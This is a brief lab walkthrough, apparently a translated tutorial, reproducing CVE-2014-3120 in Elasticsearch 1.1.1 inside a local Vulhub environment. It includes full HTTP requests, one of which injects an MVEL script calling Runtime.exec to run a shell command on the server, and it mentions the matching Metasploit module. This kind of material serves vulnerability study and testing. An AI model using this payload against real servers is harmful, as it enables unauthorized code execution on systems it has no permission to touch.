CVE-2014-3120 - ElasticSearch Command Execution Vulnerability
Vulnerability impact
- jre version: openjdk:8-jre
- elasticsearch version: v1.1.1
Vulnerability principle
The old version of ElasticSearch supports incoming dynamic scripts (MVEL) to perform some complex operations, and MVEL can execute Java code, and there is no sandbox, so we can directly execute arbitrary code.
Vulnerability recurrence
This reproduction adopts the Vulhub shooting range environment, and a Vulhub shooting range needs to be built locally
Enter the shooting range environment and start the environment with the following command:
docker-compose up -d
Check if the environment port is open
docker-compose ps
Vulnerability testing
Access the target URL path:http://192.168.0.109:9200/
First of all, the vulnerability requires at least one piece of data in es, so we need to create a piece of data first, BP enters the replay module, and replays the following Payload:
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "phithon"
}
Then, execute arbitrary code:
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
The result is shown in the figure:
MSF exploit
Enter the MSF framework, search for CVE-2014-3120, then enter the corresponding module, set the parameters to attack